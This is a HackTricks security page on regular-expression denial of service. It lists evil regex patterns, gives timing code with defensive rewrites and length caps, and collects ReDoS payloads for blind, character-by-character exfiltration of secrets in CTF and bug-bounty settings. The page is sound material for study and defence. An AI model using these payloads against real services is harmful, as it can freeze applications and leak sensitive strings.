# Regular expression Denial of Service - ReDoS
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
**Regular Expression Denial of Service (ReDoS)** happens when someone takes advantage of weaknesses in how regular expressions (a way to search for and match patterns in text) are evaluated. Sometimes, when regular expressions are used, they can become very slow, especially when the piece of text they are applied to gets larger. This slowness can become so severe that it grows extremely fast with even small increases in the size of the text. Attackers can exploit this to make a program that relies on regular expressions stop responding for a long time.
## The Problematic Naive Regex Algorithm
**Check the details in [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
## Evil Regex
An evil regex pattern is one that can **get stuck on crafted input and cause a DoS**. Evil regex patterns typically contain a group with repetition that is itself repeated, or alternation with overlapping alternatives inside a repeated group. Some examples of evil patterns are:
* `(a+)+`
* `([a-zA-Z]+)*`
* `(a|aa)+`
* `(a|a?)+`
* `(.*a){x}` for x > 10
All of them are vulnerable to the input `aaaaaaaaaaaaaaaaaaaaaaaa!`.
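The following is an added example, not code from the original page. It takes the first evil pattern from the list above, `(a+)+`, pairs it with a single-quantifier regex that accepts exactly the same strings, and measures how the matching cost of each grows with the number of `a`s in the non-matching input. It also shows the two controls a defender actually has: rewriting the pattern so there is only one way to consume the input, and capping the input length before any regex runs. The `MAX_INPUT` limit and the `evilInput` helper are assumptions made for this example.

```javascript
// Added example (not part of the original page): why nested quantifiers are
// "evil", and the two defensive controls that matter in practice.

// Evil pattern from the list above: the nested quantifier makes the split of
// the "a"s between the inner and outer repetitions ambiguous, so on a
// non-matching input the backtracking engine tries every partition.
const EVIL = /^(a+)+$/;

// Accepts exactly the same strings with a single quantifier: there is only one
// way to consume the "a"s, so a failed match is detected in linear time.
const SAFE = /^a+$/;

// Classic worst-case input (constructed): n "a"s followed by a character that
// can never match, so every attempt fails only at the very end.
function evilInput(n) {
  return "a".repeat(n) + "!";
}

// Millisecond clock; performance.now() is available in Node >= 16, Date.now()
// is the coarser fallback.
const now = () => (typeof performance !== "undefined" ? performance.now() : Date.now());

// Run one test() and report the result together with its wall-clock cost.
function timeRegex(re, text) {
  const t0 = now();
  const matched = re.test(text);
  return { matched, ms: now() - t0 };
}

// Measure the same regex over inputs of increasing length. For EVIL the cost
// roughly doubles with every extra "a"; for SAFE it stays flat.
function growthProfile(re, sizes) {
  return sizes.map(n => Object.assign({ n }, timeRegex(re, evilInput(n))));
}

// Control 1: confirm the rewrite loses nothing. Returns true when the evil and
// the safe regex agree on every input given.
function sameLanguage(inputs) {
  return inputs.every(s => EVIL.test(s) === SAFE.test(s));
}

// Control 2: a hard length cap before any regex runs. Exponential cost only
// hurts when the attacker controls the length, so bound it (assumed limit).
const MAX_INPUT = 1000;
function guardedTest(re, text, maxLen = MAX_INPUT) {
  if (text.length > maxLen) {
    return { ok: false, matched: false, reason: "input exceeds " + maxLen + " chars" };
  }
  return { ok: true, matched: re.test(text) };
}

if (typeof require !== "undefined" && require.main === module) {
  const sizes = [12, 16, 20, 24];
  console.log("EVIL /^(a+)+$/:", growthProfile(EVIL, sizes));
  console.log("SAFE /^a+$/   :", growthProfile(SAFE, sizes));
  console.log("same language :", sameLanguage(["", "a", "aaaa", "aaa!", "b"]));
  console.log("guarded       :", guardedTest(EVIL, evilInput(5000)));
}
```

Run it with `node` and compare the two profiles: the `ms` column for `EVIL` keeps doubling as `n` grows by one, while `SAFE` stays at a fraction of a millisecond. The same check applies to every pattern in the list above: if two different ways of splitting the input can reach the same state, the pattern needs either a rewrite or a length cap.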
## ReDoS Payloads
### String Exfiltration via ReDoS
In a CTF (or bug bounty) you might **control the Regex that a piece of sensitive information (the flag) is matched against**. In that case it can be useful to make the **page freeze (time out or take much longer to process)** if the **Regex matched** and **not if it didn't**. This way you can **exfiltrate** the string **char by char**:
* In [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=)((.*)*)*salt$`
* Example: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
* In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) you can find this one: `(((((((.*)*)*)*)*)*)*)!`
* In [**this writeup**](https://ctftime.org/writeup/25869) the author used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
### Controlling Input and the ReDoS Regex
The following are **ReDoS** examples where you **control** both the **input** and the **regex**:
```javascript
// Time a single regex evaluation and print how long it took
function check_time_regexp(regexp, text){
    var t0 = new Date().getTime();
    new RegExp(regexp).test(text);
    var t1 = new Date().getTime();
    console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}
// These payloads work because the input contains many "a"s followed by a
// character that can never match, which forces the engine to backtrack
[
    // "((a+)+)+$", //Eternal: does not finish in practice
    // "(a?){100}$", //Eternal
    "(a|a?)+$",
    "(\\w*)+$", //Generic
    "(a*)+$",
    "(.*a){100}$",
    "([a-zA-Z]+)*$", //Generic
    "(a+)*$",
].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))
/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/
```
## Tools
* [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
* [https://devina.io/redos-checker](https://devina.io/redos-checker)
## References
* [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
* [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
* [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)
* [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)